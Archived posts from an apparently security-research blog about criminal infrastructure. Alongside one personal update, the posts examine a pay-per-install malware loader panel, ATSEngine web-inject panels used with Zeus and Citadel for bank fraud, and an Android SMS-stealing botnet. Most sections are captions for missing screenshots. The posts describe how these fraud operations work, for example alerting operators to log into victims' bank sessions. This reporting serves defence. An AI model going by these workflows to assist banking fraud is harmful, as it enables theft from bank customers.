Saturday, 20 December 2014

i/o

Wow, it's been a awhile since i haven't written anything new here...
So to answer many questions.. no i'm not dead, and will try to get active again a bit next year.

I'm not writing this due to explanation requests or people worried (even if i got solicited many time to write something) but more because i'm motivated again to write.
As i've said many times to the recurrent e-mails i receive and continue to receive (even after 7 months of inactivity!)
I've did a lot of changement in my life, and during this time i got better things to do than writing in a blog.
Principaly i had many personal issues to resolve.
It's also not the first time i repeat that i've a life and that i've always run this blog for fun and nonprofit like my other services such as cybercrime-tracker.net
And sooner or later i will get bored and do a break although i've continued to update CCT, to don't leave people with nothing.


I changed of job also and shifted in the energy sector.
I wanted to get a job who combine my passion for mechanic and electronic.
And now i'm winding turbo-alternators for nuclear/hydraulic power plants around the world and governmental organisations. (pretty cool, huh?)
I can't tell you details obviously due to confidentiality clauses as it's critical, but making those huge machines/projects are quite awesome and the job is very meticulous.

I've joined also the administration of my local hackerspace, and now holds the position of treasurer.
I'm doing also various workshops mostly electronic/borderline related who take me time to prepare and organize.
In parallel i experiment myself also a lot, those who follow my youtube/twitter activity probably know what i mean, i received 2 day ago hydrofluoric acid.

2014 started a bit bad for me as i had a car crash the day of christmas and got the clavicle broken. Anyway globally it was a nice year, and off my blog i've met a lot of people like Horgh and many others.
Sadly i wasn't able to go to BotConf neither DahuCon this year due to my job... so maybe next year !

I've worked a bit also with Hackerstrip and released recently some codes for DarK-CodeZ #6, nothing fancy but it was fun to participate, thanks guys.
So that all, see you in 2015 for throwing cobblestones and breaking bones !

Monday, 5 May 2014

Install service for Malware affiliates and individuals

This install service was running since a long time but the server recently died.
People targeted are from Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan.

Login:

Statistics by days:
(Date, Unique visits, General visits)

Statistics by countries:
(Countries, Unique visits, Percentage, General visits)

Statistics by version:
(Version, Unique visits, Percentage, General visits)

Statistics by time:
(Time,  Users)

Downloads:
(Date, Already installed, ???? installed, Successfully installed, Copy failed, Modify failed, Register failed)

Updates:
(Date, Begin update, Downloaded update, Executed update, No ATL, Execution failed)

Statistics by tasks:
(Date, Start of xxxx, Searches, Clicks, ???)

Statistics by sites:

Statistics by ads:

Loader, users list:
 (Nickname, ID, Priority, Ban, GEO, Days, General limit, Working conditions, Today, Summary, Size, Time, File)

There is some interesting people in this listing:
Severa (Know for FakeAV, Spam)
Malwox Affiliate (Mayachok.1)
Feodal cash Affiliate (Bitcoin malware)

And if you want to know about the EXE files loaded... all are malwares (Zeus,SpyEye, Russian lockers, Spam bots, Mayachok... etc..)
The x64 Zbot covered by Kaspersky also come from here.

http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1363&start=50#p19625
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=648&start=40#p19621
The executables was rotating and was refreshed constantly, from this system, around 400 samples can be pulled per day.

Download statistics for client 191 ( Malwox TEST ):
(Date,  Derved, Executed, Ctr, Create, Exists, Down, Run, Unp)

Edit user:

Add user:

Schedule for user:

FTP:
Menu: users list, add, FTP, Stats.

For the FTP list, most of accounts were with shell on them.

Structure:

From the source:
$useZorkaJob = 0; //схч чрїюфр
$useSputnikJob = 0;
$useRekloJob = 0;
$useSpoiskJob = 0;
$useBegunCheatJob = 0;
Begun is one of the biggest ads services in Russia.

Sunday, 4 May 2014

ATSEngine

ATSEngine injects can be found oftenly inside Zeus configs, it makes the webinjects more dynamic because most of the content is located remotely and can be updated much easily instead of sending new config to all the bots.
It's the main difference with this, and a standard web inject inside Zeus.
One just allows you to do a static change in the page while the other gives you much more options, for example, customized webinjects, pop-ups, online requests for token etc...
ATSEngine have also a jabber alert feature, it let the fraudster know when the victim is logged to his bank account so it would be a god time to backconnect him (with the VNC feature of Zeus) and do the transaction.
Most of ATSEngine panels are also hosted on SSL because banks use SSL.

ATSEngine on a ZeusVM config.

ATSEngine on a Citadel config.
Example of figrabber.js from an ATSEngine panel.

Some guys do also a business with this type of web injects, for example:
He's offering a service for writing injects.
The title says "Auto-uploads and Injects from professionals for professionals"
The rest of the text explains how the service works, it's more a terms and conditions post rather than a technical description of the product, about moneyback, privacy, guarantees and other stuff.
They dont write mobile botnets, trojan horses, traffic direction systems or other malware software except injects, also they dont guarantee bypass of protection (like Rapport).
yummba is know anyway for writing injects for ATSEngine.

Let's have a look on a C&C now..


Accounts:

Reports:

Options main:

Options Jabber:

Another panel, on SSL:

Another panel, on SSL:

Another panel, still on SSL:

Details:

Additional fields rules:

Additionnal fields rules (texts):

Edit rule:

Edit text:

VBV/MCSC rules:

Add a rule:

Options:

Options (CC Checker):

Files, dumped from another panel, targeting La banque Postal (a French bank):

Sunday, 27 April 2014

Android.Trojan.Rubobi.A (SmsPiratBot)

Another Android botnet dumped recently.
This malware can send and intercept sms from bots.
Like most of android botnets, they are used mainly to target mobile banks like Sberbank (www.sberbank.ru - the biggest bank in Russia)
In Russia, you can transfer money from one card to another card through mobile sms
This botnet is sold 120$

Fake App:
MD5: 2ea5e73653d1454c04ecd48202dcc391

Login:

System Stats:

Countries:

Operators:

Task Stats:

Task Editor:

Blacklist:

Stored SMS:

Another panel:

Structure: